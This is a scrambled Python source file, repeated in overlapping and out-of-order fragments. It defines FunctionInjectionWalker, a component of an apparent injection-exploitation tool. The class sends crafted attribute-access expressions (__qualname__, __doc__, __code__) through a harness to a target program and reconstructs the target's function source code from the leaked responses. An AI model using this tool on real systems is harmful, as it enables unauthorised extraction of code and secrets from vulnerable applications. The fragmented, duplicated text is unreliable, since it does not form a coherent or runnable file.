[f' {line}'", "( CodeObjectInjectionWalker) from .doc_string_injection_walker import ( DocStringInjectionWalker) from .failed_injection_walker import ( FailedInjectionWalker) from", "if not self._name_walker.is_default: if self._name_walker.value in self._engine.function_blacklist: return self._engine.function_blacklist.add(self._name_walker.value) yield from self._walk_docstring() code_obj_injection", "for injection response ' f'{raw_result}') return elif not isinstance(walker, CodeObjectInjectionWalker): yield FailedInjectionWalker.msg( f'Got", "Optional[str] = None @property def code_walker( self ) -> Optional[CodeObjectInjectionWalker]: \"\"\"The code object", "self._name_walker.is_default: if self._name_walker.value in self._engine.function_blacklist: return self._engine.function_blacklist.add(self._name_walker.value) yield from self._walk_docstring() code_obj_injection = f'{self._injection_str}.__code__'", ") -> Iterator[AbstractInjectionWalker]: \"\"\"Recover the function's __name__ attribute.\"\"\" name_injection = f'{self._injection_str}.__qualname__!r' result =", "self ) -> Iterator[AbstractInjectionWalker]: \"\"\"Recover the function's __doc__ attribute.\"\"\" doc_string_injection = f'{self._injection_str}.__doc__!r' result", "'attribute; something is terribly wrong...') return for sub_walker in walker.walk(): yield sub_walker if", "= f'{self._injection_str}.__qualname__!r' result = self._harness.send_injection(name_injection) if result is None: yield FailedInjectionWalker.msg( 'Unable to", "self._harness.send_injection(code_obj_injection) if raw_result is None: yield FailedInjectionWalker.msg( 'Unable to recover injection response from", "not isinstance(walker, NameInjectionWalker): yield FailedInjectionWalker.msg( f'Expected a name walker when sending {name_injection} '", "f'{walker.injection_str}') return src_lines = ([] if walker.src_code is None else walker.src_code.splitlines()) indented_src_lines =", "arg_sequence = inspect_signature(func) return f'def {code_obj.co_name}{arg_sequence}:' except TypeError: # build our own signature", "This attribute will only be populated after a call to :func:`walk`. If the", "function's __doc__ string.\"\"\" return self._docstring_walker @property def src_code( self ) -> Optional[str]: \"\"\"The", "function via injection ' f'{name_injection}') return walker = self.next_walker(name_injection, result) if not isinstance(walker,", "FailedInjectionWalker) from .name_injection_walker import ( NameInjectionWalker) class FunctionInjectionWalker(AbstractInjectionWalker): \"\"\"Injection walker for a function.", "self._name_walker @property def docstring_walker( self ) -> DocStringInjectionWalker: \"\"\"Walker used to recover this", "to ``walk()`` cannot recover the object, then this attribute will remain as ``None``.", "f'{self._injection_str}.__qualname__!r' result = self._harness.send_injection(name_injection) if result is None: yield FailedInjectionWalker.msg( 'Unable to read", "{name_injection} ' f'but got {walker.__class__.__qualname__} instead') return yield from walker.walk() self._name_walker = walker", "that this walker recovered from the target.\"\"\" return self._src_code @property def signature( self", "= r'<function .+ at 0x[0-9a-fA-F]+>' def __extra_init__( self ) -> None: self._code_walker: Optional[CodeObjectInjectionWalker]", "yield sub_walker if walker.code_obj is None or walker.src_code is None: yield FailedInjectionWalker.msg( 'Unable", "([] if walker.src_code is None else walker.src_code.splitlines()) indented_src_lines = [f' {line}' for line", "-> Iterator[AbstractInjectionWalker]: yield from self._walk_name() if not self._name_walker.is_default: if self._name_walker.value in self._engine.function_blacklist: return", "build our own signature return f\"\"\"\\ # exact argument names could not be", "= FunctionType(code_obj, {}) arg_sequence = inspect_signature(func) return f'def {code_obj.co_name}{arg_sequence}:' except TypeError: # build", "@property def docstring_walker( self ) -> DocStringInjectionWalker: \"\"\"Walker used to recover this function's", "import ( CodeObjectInjectionWalker) from .doc_string_injection_walker import ( DocStringInjectionWalker) from .failed_injection_walker import ( FailedInjectionWalker)", "at 0x[0-9a-fA-F]+>' def __extra_init__( self ) -> None: self._code_walker: Optional[CodeObjectInjectionWalker] = None self._name_walker:", "isinstance(walker, DocStringInjectionWalker): yield FailedInjectionWalker.msg( f'Expected a doc walker when sending {doc_string_injection} ' f'but", "from string ' f'{raw_result}') return walker = self.next_walker(code_obj_injection, raw_result) if walker is None:", "remain as ``None``. \"\"\" return self._code_walker @property def name_walker( self ) -> NameInjectionWalker:", "return self._engine.function_blacklist.add(self._name_walker.value) yield from self._walk_docstring() code_obj_injection = f'{self._injection_str}.__code__' raw_result = self._harness.send_injection(code_obj_injection) if raw_result", "raw_result is None: yield FailedInjectionWalker.msg( 'Unable to recover injection response from string '", "from self._walk_name() if not self._name_walker.is_default: if self._name_walker.value in self._engine.function_blacklist: return self._engine.function_blacklist.add(self._name_walker.value) yield from", "f' \"\"\"{self._docstring_walker.value}\"\"\"\\n' self._src_code += '\\n'.join(indented_src_lines) yield self def _walk_name( self ) -> Iterator[AbstractInjectionWalker]:", "used to recover this function's __name__.\"\"\" return self._name_walker @property def docstring_walker( self )", "self._walk_docstring() code_obj_injection = f'{self._injection_str}.__code__' raw_result = self._harness.send_injection(code_obj_injection) if raw_result is None: yield FailedInjectionWalker.msg(", "= walker @staticmethod def code_obj_to_signature( code_obj: CodeType ) -> str: \"\"\"Get a function", "doc walker when sending {doc_string_injection} ' f'but got {walker.__class__.__qualname__} instead') return yield from", "NameInjectionWalker) class FunctionInjectionWalker(AbstractInjectionWalker): \"\"\"Injection walker for a function. This module will attempt to", "walker = self.next_walker(code_obj_injection, raw_result) if walker is None: yield FailedInjectionWalker.msg( 'No matching walker", "injection response from string ' f'{raw_result}') return walker = self.next_walker(code_obj_injection, raw_result) if walker", "if one was retrieved.\"\"\" return self._signature def walk( self ) -> Iterator[AbstractInjectionWalker]: yield", "self._signature = self.__class__.code_obj_to_signature( walker.code_obj) self._src_code = f'{self._signature}\\n' if self._docstring_walker.value: self._src_code += f' \"\"\"{self._docstring_walker.value}\"\"\"\\n'", "None @property def code_walker( self ) -> Optional[CodeObjectInjectionWalker]: \"\"\"The code object that this", "``walk()`` cannot recover the object, then this attribute will remain as ``None``. \"\"\"", "function, via access to its ``__code__`` attribute. \"\"\" INJECTION_RE = None RESPONSE_RE =", "the FunctionInjectionWalker class.\"\"\" from inspect import ( signature as inspect_signature) from types import", "= self.next_walker(doc_string_injection, result) if not isinstance(walker, DocStringInjectionWalker): yield FailedInjectionWalker.msg( f'Expected a doc walker", "when injecting function __code__ ' 'attribute; something is terribly wrong...') return for sub_walker", "if result is None: yield FailedInjectionWalker.msg( 'Unable to read __name__ of function via", "'Unable to recover injection response from string ' f'{raw_result}') return walker = self.next_walker(code_obj_injection,", "( signature as inspect_signature) from types import ( CodeType, FunctionType) from typing import", ") -> Iterator[AbstractInjectionWalker]: yield from self._walk_name() if not self._name_walker.is_default: if self._name_walker.value in self._engine.function_blacklist:", "elif not isinstance(walker, CodeObjectInjectionWalker): yield FailedInjectionWalker.msg( f'Got {type(walker)} when injecting function __code__ '", "from .abstract_injection_walker import ( AbstractInjectionWalker) from .code_object_injection_walker import ( CodeObjectInjectionWalker) from .doc_string_injection_walker import", "self ) -> Optional[str]: \"\"\"The decompiled function's signature, if one was retrieved.\"\"\" return", "CodeObjectInjectionWalker) from .doc_string_injection_walker import ( DocStringInjectionWalker) from .failed_injection_walker import ( FailedInjectionWalker) from .name_injection_walker", "this function's __doc__ string.\"\"\" return self._docstring_walker @property def src_code( self ) -> Optional[str]:", "is None or walker.src_code is None: yield FailedInjectionWalker.msg( 'Unable to successfully recover code", "is None: yield FailedInjectionWalker.msg( 'Unable to successfully recover code object from string '", "'\\n'.join(indented_src_lines) yield self def _walk_name( self ) -> Iterator[AbstractInjectionWalker]: \"\"\"Recover the function's __name__", "\"\"\"Get a function signature from a code object. See: https://stackoverflow.com/a/56761306/5094008 \"\"\" try: func", "f'{raw_result}') return walker = self.next_walker(code_obj_injection, raw_result) if walker is None: yield FailedInjectionWalker.msg( 'No", "\"\"\"The source code that this walker recovered from the target.\"\"\" return self._src_code @property", "' f'{doc_string_injection}') return walker = self.next_walker(doc_string_injection, result) if not isinstance(walker, DocStringInjectionWalker): yield FailedInjectionWalker.msg(", "a function, via access to its ``__code__`` attribute. \"\"\" INJECTION_RE = None RESPONSE_RE", "self._src_code @property def signature( self ) -> Optional[str]: \"\"\"The decompiled function's signature, if", "from a code object. See: https://stackoverflow.com/a/56761306/5094008 \"\"\" try: func = FunctionType(code_obj, {}) arg_sequence", "module will attempt to recover the source code from a function, via access", "__doc__ attribute.\"\"\" doc_string_injection = f'{self._injection_str}.__doc__!r' result = self._harness.send_injection(doc_string_injection) if result is None: yield", "self.empty_instance(DocStringInjectionWalker) self._src_code: Optional[str] = None self._signature: Optional[str] = None @property def code_walker( self", "walker found for injection response ' f'{raw_result}') return elif not isinstance(walker, CodeObjectInjectionWalker): yield", "function's __doc__ attribute.\"\"\" doc_string_injection = f'{self._injection_str}.__doc__!r' result = self._harness.send_injection(doc_string_injection) if result is None:", "( CodeType, FunctionType) from typing import ( Iterator, Optional) from .abstract_injection_walker import (", "\\ self.empty_instance(DocStringInjectionWalker) self._src_code: Optional[str] = None self._signature: Optional[str] = None @property def code_walker(", "types import ( CodeType, FunctionType) from typing import ( Iterator, Optional) from .abstract_injection_walker", "NameInjectionWalker): yield FailedInjectionWalker.msg( f'Expected a name walker when sending {name_injection} ' f'but got", "Optional[str]: \"\"\"The source code that this walker recovered from the target.\"\"\" return self._src_code", "function __code__ ' 'attribute; something is terribly wrong...') return for sub_walker in walker.walk():", "FailedInjectionWalker.msg( 'Unable to read __doc__ of function via injection ' f'{doc_string_injection}') return walker", "code_obj: CodeType ) -> str: \"\"\"Get a function signature from a code object.", "one was retrieved.\"\"\" return self._signature def walk( self ) -> Iterator[AbstractInjectionWalker]: yield from", "= f'{self._injection_str}.__code__' raw_result = self._harness.send_injection(code_obj_injection) if raw_result is None: yield FailedInjectionWalker.msg( 'Unable to", "if self._docstring_walker.value: self._src_code += f' \"\"\"{self._docstring_walker.value}\"\"\"\\n' self._src_code += '\\n'.join(indented_src_lines) yield self def _walk_name(", "'No matching walker found for injection response ' f'{raw_result}') return elif not isinstance(walker,", "def docstring_walker( self ) -> DocStringInjectionWalker: \"\"\"Walker used to recover this function's __doc__", "injecting function __code__ ' 'attribute; something is terribly wrong...') return for sub_walker in", "sending {name_injection} ' f'but got {walker.__class__.__qualname__} instead') return yield from walker.walk() self._name_walker =", "terribly wrong...') return for sub_walker in walker.walk(): yield sub_walker if walker.code_obj is None", "@staticmethod def code_obj_to_signature( code_obj: CodeType ) -> str: \"\"\"Get a function signature from", "from .doc_string_injection_walker import ( DocStringInjectionWalker) from .failed_injection_walker import ( FailedInjectionWalker) from .name_injection_walker import", "self._harness.send_injection(doc_string_injection) if result is None: yield FailedInjectionWalker.msg( 'Unable to read __doc__ of function", "{code_obj.co_name}(*args, **kwargs):\"\"\" def __str__( self ) -> str: return f'Injected function object with", "the call to ``walk()`` cannot recover the object, then this attribute will remain", "self.next_walker(code_obj_injection, raw_result) if walker is None: yield FailedInjectionWalker.msg( 'No matching walker found for", "response ' f'{raw_result}') return elif not isinstance(walker, CodeObjectInjectionWalker): yield FailedInjectionWalker.msg( f'Got {type(walker)} when", "\"\"\"{self._docstring_walker.value}\"\"\"\\n' self._src_code += '\\n'.join(indented_src_lines) yield self def _walk_name( self ) -> Iterator[AbstractInjectionWalker]: \"\"\"Recover", "to read __name__ of function via injection ' f'{name_injection}') return walker = self.next_walker(name_injection,", "NameInjectionWalker: \"\"\"Walker used to recover this function's __name__.\"\"\" return self._name_walker @property def docstring_walker(", "return walker = self.next_walker(name_injection, result) if not isinstance(walker, NameInjectionWalker): yield FailedInjectionWalker.msg( f'Expected a", "to successfully recover code object from string ' f'{walker.injection_str}') return src_lines = ([]", "self._name_walker = walker def _walk_docstring( self ) -> Iterator[AbstractInjectionWalker]: \"\"\"Recover the function's __doc__", "\"\"\"Implementation of the FunctionInjectionWalker class.\"\"\" from inspect import ( signature as inspect_signature) from", "as inspect_signature) from types import ( CodeType, FunctionType) from typing import ( Iterator,", "is None: yield FailedInjectionWalker.msg( 'Unable to recover injection response from string ' f'{raw_result}')", "to its ``__code__`` attribute. \"\"\" INJECTION_RE = None RESPONSE_RE = r'<function .+ at", "result = self._harness.send_injection(name_injection) if result is None: yield FailedInjectionWalker.msg( 'Unable to read __name__", "yield FailedInjectionWalker.msg( f'Got {type(walker)} when injecting function __code__ ' 'attribute; something is terribly", "used to recover this function's __doc__ string.\"\"\" return self._docstring_walker @property def src_code( self", "FunctionInjectionWalker class.\"\"\" from inspect import ( signature as inspect_signature) from types import (", "walker = self.next_walker(doc_string_injection, result) if not isinstance(walker, DocStringInjectionWalker): yield FailedInjectionWalker.msg( f'Expected a doc", ") -> NameInjectionWalker: \"\"\"Walker used to recover this function's __name__.\"\"\" return self._name_walker @property", "raw_result) if walker is None: yield FailedInjectionWalker.msg( 'No matching walker found for injection", "return f'def {code_obj.co_name}{arg_sequence}:' except TypeError: # build our own signature return f\"\"\"\\ #", "call to :func:`walk`. If the call to ``walk()`` cannot recover the object, then", "from self._walk_docstring() code_obj_injection = f'{self._injection_str}.__code__' raw_result = self._harness.send_injection(code_obj_injection) if raw_result is None: yield", "self._docstring_walker = walker @staticmethod def code_obj_to_signature( code_obj: CodeType ) -> str: \"\"\"Get a", "target. This attribute will only be populated after a call to :func:`walk`. If", "if not isinstance(walker, NameInjectionWalker): yield FailedInjectionWalker.msg( f'Expected a name walker when sending {name_injection}", "def _walk_name( self ) -> Iterator[AbstractInjectionWalker]: \"\"\"Recover the function's __name__ attribute.\"\"\" name_injection =", "\"\"\" return self._code_walker @property def name_walker( self ) -> NameInjectionWalker: \"\"\"Walker used to", "None: yield FailedInjectionWalker.msg( 'Unable to recover injection response from string ' f'{raw_result}') return", "f'{name_injection}') return walker = self.next_walker(name_injection, result) if not isinstance(walker, NameInjectionWalker): yield FailedInjectionWalker.msg( f'Expected", "f\"\"\"\\ # exact argument names could not be reversed for below signature def", "self.next_walker(doc_string_injection, result) if not isinstance(walker, DocStringInjectionWalker): yield FailedInjectionWalker.msg( f'Expected a doc walker when", "from types import ( CodeType, FunctionType) from typing import ( Iterator, Optional) from", "to :func:`walk`. If the call to ``walk()`` cannot recover the object, then this", "to recover this function's __doc__ string.\"\"\" return self._docstring_walker @property def src_code( self )", "__name__ of function via injection ' f'{name_injection}') return walker = self.next_walker(name_injection, result) if", "in walker.walk(): yield sub_walker if walker.code_obj is None or walker.src_code is None: yield", "from the target.\"\"\" return self._src_code @property def signature( self ) -> Optional[str]: \"\"\"The", "'Unable to successfully recover code object from string ' f'{walker.injection_str}') return src_lines =", "= None self._signature: Optional[str] = None @property def code_walker( self ) -> Optional[CodeObjectInjectionWalker]:", "= self.__class__.code_obj_to_signature( walker.code_obj) self._src_code = f'{self._signature}\\n' if self._docstring_walker.value: self._src_code += f' \"\"\"{self._docstring_walker.value}\"\"\"\\n' self._src_code", "sub_walker in walker.walk(): yield sub_walker if walker.code_obj is None or walker.src_code is None:", "Optional[str] = None self._signature: Optional[str] = None @property def code_walker( self ) ->", "FailedInjectionWalker.msg( f'Expected a doc walker when sending {doc_string_injection} ' f'but got {walker.__class__.__qualname__} instead')", "return self._docstring_walker @property def src_code( self ) -> Optional[str]: \"\"\"The source code that", "+= f' \"\"\"{self._docstring_walker.value}\"\"\"\\n' self._src_code += '\\n'.join(indented_src_lines) yield self def _walk_name( self ) ->", "object from string ' f'{walker.injection_str}') return src_lines = ([] if walker.src_code is None", "CodeType ) -> str: \"\"\"Get a function signature from a code object. See:", "def __extra_init__( self ) -> None: self._code_walker: Optional[CodeObjectInjectionWalker] = None self._name_walker: NameInjectionWalker =", ") -> str: \"\"\"Get a function signature from a code object. See: https://stackoverflow.com/a/56761306/5094008", "if raw_result is None: yield FailedInjectionWalker.msg( 'Unable to recover injection response from string", "signature as inspect_signature) from types import ( CodeType, FunctionType) from typing import (", "function's __name__ attribute.\"\"\" name_injection = f'{self._injection_str}.__qualname__!r' result = self._harness.send_injection(name_injection) if result is None:", "self._docstring_walker.value: self._src_code += f' \"\"\"{self._docstring_walker.value}\"\"\"\\n' self._src_code += '\\n'.join(indented_src_lines) yield self def _walk_name( self", "DocStringInjectionWalker = \\ self.empty_instance(DocStringInjectionWalker) self._src_code: Optional[str] = None self._signature: Optional[str] = None @property", "__doc__ string.\"\"\" return self._docstring_walker @property def src_code( self ) -> Optional[str]: \"\"\"The source", "isinstance(walker, NameInjectionWalker): yield FailedInjectionWalker.msg( f'Expected a name walker when sending {name_injection} ' f'but", "string ' f'{raw_result}') return walker = self.next_walker(code_obj_injection, raw_result) if walker is None: yield", "CodeObjectInjectionWalker): yield FailedInjectionWalker.msg( f'Got {type(walker)} when injecting function __code__ ' 'attribute; something is", ".doc_string_injection_walker import ( DocStringInjectionWalker) from .failed_injection_walker import ( FailedInjectionWalker) from .name_injection_walker import (", "this attribute will remain as ``None``. \"\"\" return self._code_walker @property def name_walker( self", "walk( self ) -> Iterator[AbstractInjectionWalker]: yield from self._walk_name() if not self._name_walker.is_default: if self._name_walker.value", "' f'{raw_result}') return elif not isinstance(walker, CodeObjectInjectionWalker): yield FailedInjectionWalker.msg( f'Got {type(walker)} when injecting", "# exact argument names could not be reversed for below signature def {code_obj.co_name}(*args,", "import ( CodeType, FunctionType) from typing import ( Iterator, Optional) from .abstract_injection_walker import", "None: yield FailedInjectionWalker.msg( 'Unable to successfully recover code object from string ' f'{walker.injection_str}')", "self.__class__.code_obj_to_signature( walker.code_obj) self._src_code = f'{self._signature}\\n' if self._docstring_walker.value: self._src_code += f' \"\"\"{self._docstring_walker.value}\"\"\"\\n' self._src_code +=", ") -> Optional[str]: \"\"\"The source code that this walker recovered from the target.\"\"\"", "our own signature return f\"\"\"\\ # exact argument names could not be reversed", "self ) -> Iterator[AbstractInjectionWalker]: \"\"\"Recover the function's __name__ attribute.\"\"\" name_injection = f'{self._injection_str}.__qualname__!r' result", "Iterator[AbstractInjectionWalker]: yield from self._walk_name() if not self._name_walker.is_default: if self._name_walker.value in self._engine.function_blacklist: return self._engine.function_blacklist.add(self._name_walker.value)", "f'Expected a name walker when sending {name_injection} ' f'but got {walker.__class__.__qualname__} instead') return", "recovered from the target. This attribute will only be populated after a call", "will attempt to recover the source code from a function, via access to", "return walker = self.next_walker(doc_string_injection, result) if not isinstance(walker, DocStringInjectionWalker): yield FailedInjectionWalker.msg( f'Expected a", "yield self def _walk_name( self ) -> Iterator[AbstractInjectionWalker]: \"\"\"Recover the function's __name__ attribute.\"\"\"", ") -> Optional[str]: \"\"\"The decompiled function's signature, if one was retrieved.\"\"\" return self._signature", "attribute will only be populated after a call to :func:`walk`. If the call", "f'{self._signature}\\n' if self._docstring_walker.value: self._src_code += f' \"\"\"{self._docstring_walker.value}\"\"\"\\n' self._src_code += '\\n'.join(indented_src_lines) yield self def", "src_code( self ) -> Optional[str]: \"\"\"The source code that this walker recovered from", "will remain as ``None``. \"\"\" return self._code_walker @property def name_walker( self ) ->", "walker recovered from the target.\"\"\" return self._src_code @property def signature( self ) ->", "the function's __name__ attribute.\"\"\" name_injection = f'{self._injection_str}.__qualname__!r' result = self._harness.send_injection(name_injection) if result is", "\"\"\"The decompiled function's signature, if one was retrieved.\"\"\" return self._signature def walk( self", "\"\"\"The code object that this walker recovered from the target. This attribute will", "= [f' {line}' for line in src_lines] self._signature = self.__class__.code_obj_to_signature( walker.code_obj) self._src_code =", "return src_lines = ([] if walker.src_code is None else walker.src_code.splitlines()) indented_src_lines = [f'", "self._code_walker: Optional[CodeObjectInjectionWalker] = None self._name_walker: NameInjectionWalker = \\ self.empty_instance(NameInjectionWalker) self._docstring_walker: DocStringInjectionWalker = \\", "if walker is None: yield FailedInjectionWalker.msg( 'No matching walker found for injection response", ".abstract_injection_walker import ( AbstractInjectionWalker) from .code_object_injection_walker import ( CodeObjectInjectionWalker) from .doc_string_injection_walker import (", "class FunctionInjectionWalker(AbstractInjectionWalker): \"\"\"Injection walker for a function. This module will attempt to recover", "{doc_string_injection} ' f'but got {walker.__class__.__qualname__} instead') return yield from walker.walk() self._docstring_walker = walker", "walker when sending {name_injection} ' f'but got {walker.__class__.__qualname__} instead') return yield from walker.walk()", "DocStringInjectionWalker: \"\"\"Walker used to recover this function's __doc__ string.\"\"\" return self._docstring_walker @property def", "sub_walker if walker.code_obj is None or walker.src_code is None: yield FailedInjectionWalker.msg( 'Unable to", "AbstractInjectionWalker) from .code_object_injection_walker import ( CodeObjectInjectionWalker) from .doc_string_injection_walker import ( DocStringInjectionWalker) from .failed_injection_walker", "below signature def {code_obj.co_name}(*args, **kwargs):\"\"\" def __str__( self ) -> str: return f'Injected", "for a function. This module will attempt to recover the source code from", "from a function, via access to its ``__code__`` attribute. \"\"\" INJECTION_RE = None", "be populated after a call to :func:`walk`. If the call to ``walk()`` cannot", "result is None: yield FailedInjectionWalker.msg( 'Unable to read __name__ of function via injection", "import ( NameInjectionWalker) class FunctionInjectionWalker(AbstractInjectionWalker): \"\"\"Injection walker for a function. This module will", "walker is None: yield FailedInjectionWalker.msg( 'No matching walker found for injection response '", "INJECTION_RE = None RESPONSE_RE = r'<function .+ at 0x[0-9a-fA-F]+>' def __extra_init__( self )", "own signature return f\"\"\"\\ # exact argument names could not be reversed for", "yield FailedInjectionWalker.msg( 'Unable to read __name__ of function via injection ' f'{name_injection}') return", "_walk_docstring( self ) -> Iterator[AbstractInjectionWalker]: \"\"\"Recover the function's __doc__ attribute.\"\"\" doc_string_injection = f'{self._injection_str}.__doc__!r'", ".code_object_injection_walker import ( CodeObjectInjectionWalker) from .doc_string_injection_walker import ( DocStringInjectionWalker) from .failed_injection_walker import (", "' 'attribute; something is terribly wrong...') return for sub_walker in walker.walk(): yield sub_walker", "( FailedInjectionWalker) from .name_injection_walker import ( NameInjectionWalker) class FunctionInjectionWalker(AbstractInjectionWalker): \"\"\"Injection walker for a", "= None @property def code_walker( self ) -> Optional[CodeObjectInjectionWalker]: \"\"\"The code object that", "**kwargs):\"\"\" def __str__( self ) -> str: return f'Injected function object with string", "return self._src_code @property def signature( self ) -> Optional[str]: \"\"\"The decompiled function's signature,", "docstring_walker( self ) -> DocStringInjectionWalker: \"\"\"Walker used to recover this function's __doc__ string.\"\"\"", "-> Iterator[AbstractInjectionWalker]: \"\"\"Recover the function's __name__ attribute.\"\"\" name_injection = f'{self._injection_str}.__qualname__!r' result = self._harness.send_injection(name_injection)", "func = FunctionType(code_obj, {}) arg_sequence = inspect_signature(func) return f'def {code_obj.co_name}{arg_sequence}:' except TypeError: #", "not be reversed for below signature def {code_obj.co_name}(*args, **kwargs):\"\"\" def __str__( self )", "reversed for below signature def {code_obj.co_name}(*args, **kwargs):\"\"\" def __str__( self ) -> str:", "string.\"\"\" return self._docstring_walker @property def src_code( self ) -> Optional[str]: \"\"\"The source code", "yield from self._walk_name() if not self._name_walker.is_default: if self._name_walker.value in self._engine.function_blacklist: return self._engine.function_blacklist.add(self._name_walker.value) yield", "then this attribute will remain as ``None``. \"\"\" return self._code_walker @property def name_walker(", "' f'{name_injection}') return walker = self.next_walker(name_injection, result) if not isinstance(walker, NameInjectionWalker): yield FailedInjectionWalker.msg(", "string ' f'{walker.injection_str}') return src_lines = ([] if walker.src_code is None else walker.src_code.splitlines())", "access to its ``__code__`` attribute. \"\"\" INJECTION_RE = None RESPONSE_RE = r'<function .+", "if walker.src_code is None else walker.src_code.splitlines()) indented_src_lines = [f' {line}' for line in", "-> Iterator[AbstractInjectionWalker]: \"\"\"Recover the function's __doc__ attribute.\"\"\" doc_string_injection = f'{self._injection_str}.__doc__!r' result = self._harness.send_injection(doc_string_injection)", "signature def {code_obj.co_name}(*args, **kwargs):\"\"\" def __str__( self ) -> str: return f'Injected function", "\"\"\" try: func = FunctionType(code_obj, {}) arg_sequence = inspect_signature(func) return f'def {code_obj.co_name}{arg_sequence}:' except", "{line}' for line in src_lines] self._signature = self.__class__.code_obj_to_signature( walker.code_obj) self._src_code = f'{self._signature}\\n' if", "self._code_walker @property def name_walker( self ) -> NameInjectionWalker: \"\"\"Walker used to recover this", "class.\"\"\" from inspect import ( signature as inspect_signature) from types import ( CodeType,", "this walker recovered from the target.\"\"\" return self._src_code @property def signature( self )", "[f' {line}' for line in src_lines] self._signature = self.__class__.code_obj_to_signature( walker.code_obj) self._src_code = f'{self._signature}\\n'", "could not be reversed for below signature def {code_obj.co_name}(*args, **kwargs):\"\"\" def __str__( self", "from typing import ( Iterator, Optional) from .abstract_injection_walker import ( AbstractInjectionWalker) from .code_object_injection_walker", "signature return f\"\"\"\\ # exact argument names could not be reversed for below", "to recover injection response from string ' f'{raw_result}') return walker = self.next_walker(code_obj_injection, raw_result)", "' f'but got {walker.__class__.__qualname__} instead') return yield from walker.walk() self._docstring_walker = walker @staticmethod", "read __name__ of function via injection ' f'{name_injection}') return walker = self.next_walker(name_injection, result)", "'Unable to read __name__ of function via injection ' f'{name_injection}') return walker =", "result) if not isinstance(walker, DocStringInjectionWalker): yield FailedInjectionWalker.msg( f'Expected a doc walker when sending", "response from string ' f'{raw_result}') return walker = self.next_walker(code_obj_injection, raw_result) if walker is", "None: yield FailedInjectionWalker.msg( 'Unable to read __name__ of function via injection ' f'{name_injection}')", "self._harness.send_injection(name_injection) if result is None: yield FailedInjectionWalker.msg( 'Unable to read __name__ of function", "read __doc__ of function via injection ' f'{doc_string_injection}') return walker = self.next_walker(doc_string_injection, result)", "Iterator, Optional) from .abstract_injection_walker import ( AbstractInjectionWalker) from .code_object_injection_walker import ( CodeObjectInjectionWalker) from", "``None``. \"\"\" return self._code_walker @property def name_walker( self ) -> NameInjectionWalker: \"\"\"Walker used", "str: \"\"\"Get a function signature from a code object. See: https://stackoverflow.com/a/56761306/5094008 \"\"\" try:", "https://stackoverflow.com/a/56761306/5094008 \"\"\" try: func = FunctionType(code_obj, {}) arg_sequence = inspect_signature(func) return f'def {code_obj.co_name}{arg_sequence}:'", "import ( FailedInjectionWalker) from .name_injection_walker import ( NameInjectionWalker) class FunctionInjectionWalker(AbstractInjectionWalker): \"\"\"Injection walker for", "self._docstring_walker: DocStringInjectionWalker = \\ self.empty_instance(DocStringInjectionWalker) self._src_code: Optional[str] = None self._signature: Optional[str] = None", "walker when sending {doc_string_injection} ' f'but got {walker.__class__.__qualname__} instead') return yield from walker.walk()", "def signature( self ) -> Optional[str]: \"\"\"The decompiled function's signature, if one was", "DocStringInjectionWalker) from .failed_injection_walker import ( FailedInjectionWalker) from .name_injection_walker import ( NameInjectionWalker) class FunctionInjectionWalker(AbstractInjectionWalker):", "a call to :func:`walk`. If the call to ``walk()`` cannot recover the object,", "self._src_code = f'{self._signature}\\n' if self._docstring_walker.value: self._src_code += f' \"\"\"{self._docstring_walker.value}\"\"\"\\n' self._src_code += '\\n'.join(indented_src_lines) yield", "{walker.__class__.__qualname__} instead') return yield from walker.walk() self._name_walker = walker def _walk_docstring( self )", "-> DocStringInjectionWalker: \"\"\"Walker used to recover this function's __doc__ string.\"\"\" return self._docstring_walker @property", "inspect_signature(func) return f'def {code_obj.co_name}{arg_sequence}:' except TypeError: # build our own signature return f\"\"\"\\", "f'Expected a doc walker when sending {doc_string_injection} ' f'but got {walker.__class__.__qualname__} instead') return", "source code that this walker recovered from the target.\"\"\" return self._src_code @property def", "via injection ' f'{name_injection}') return walker = self.next_walker(name_injection, result) if not isinstance(walker, NameInjectionWalker):", "def code_walker( self ) -> Optional[CodeObjectInjectionWalker]: \"\"\"The code object that this walker recovered", "Optional[CodeObjectInjectionWalker] = None self._name_walker: NameInjectionWalker = \\ self.empty_instance(NameInjectionWalker) self._docstring_walker: DocStringInjectionWalker = \\ self.empty_instance(DocStringInjectionWalker)", "__code__ ' 'attribute; something is terribly wrong...') return for sub_walker in walker.walk(): yield", "self._signature def walk( self ) -> Iterator[AbstractInjectionWalker]: yield from self._walk_name() if not self._name_walker.is_default:", "when sending {name_injection} ' f'but got {walker.__class__.__qualname__} instead') return yield from walker.walk() self._name_walker", "Iterator[AbstractInjectionWalker]: \"\"\"Recover the function's __doc__ attribute.\"\"\" doc_string_injection = f'{self._injection_str}.__doc__!r' result = self._harness.send_injection(doc_string_injection) if", "walker = self.next_walker(name_injection, result) if not isinstance(walker, NameInjectionWalker): yield FailedInjectionWalker.msg( f'Expected a name", "= walker def _walk_docstring( self ) -> Iterator[AbstractInjectionWalker]: \"\"\"Recover the function's __doc__ attribute.\"\"\"", "successfully recover code object from string ' f'{walker.injection_str}') return src_lines = ([] if", "Optional[CodeObjectInjectionWalker]: \"\"\"The code object that this walker recovered from the target. This attribute", "= self._harness.send_injection(name_injection) if result is None: yield FailedInjectionWalker.msg( 'Unable to read __name__ of", "recover code object from string ' f'{walker.injection_str}') return src_lines = ([] if walker.src_code", "yield FailedInjectionWalker.msg( 'No matching walker found for injection response ' f'{raw_result}') return elif", "populated after a call to :func:`walk`. If the call to ``walk()`` cannot recover", "\\ self.empty_instance(NameInjectionWalker) self._docstring_walker: DocStringInjectionWalker = \\ self.empty_instance(DocStringInjectionWalker) self._src_code: Optional[str] = None self._signature: Optional[str]", "self._src_code: Optional[str] = None self._signature: Optional[str] = None @property def code_walker( self )", "only be populated after a call to :func:`walk`. If the call to ``walk()``", "in self._engine.function_blacklist: return self._engine.function_blacklist.add(self._name_walker.value) yield from self._walk_docstring() code_obj_injection = f'{self._injection_str}.__code__' raw_result = self._harness.send_injection(code_obj_injection)", "from .failed_injection_walker import ( FailedInjectionWalker) from .name_injection_walker import ( NameInjectionWalker) class FunctionInjectionWalker(AbstractInjectionWalker): \"\"\"Injection", "function via injection ' f'{doc_string_injection}') return walker = self.next_walker(doc_string_injection, result) if not isinstance(walker,", "walker.walk(): yield sub_walker if walker.code_obj is None or walker.src_code is None: yield FailedInjectionWalker.msg(", "def __str__( self ) -> str: return f'Injected function object with string {self._injection_str}'", "wrong...') return for sub_walker in walker.walk(): yield sub_walker if walker.code_obj is None or", "a name walker when sending {name_injection} ' f'but got {walker.__class__.__qualname__} instead') return yield", "inspect import ( signature as inspect_signature) from types import ( CodeType, FunctionType) from", "self._docstring_walker @property def src_code( self ) -> Optional[str]: \"\"\"The source code that this", "result is None: yield 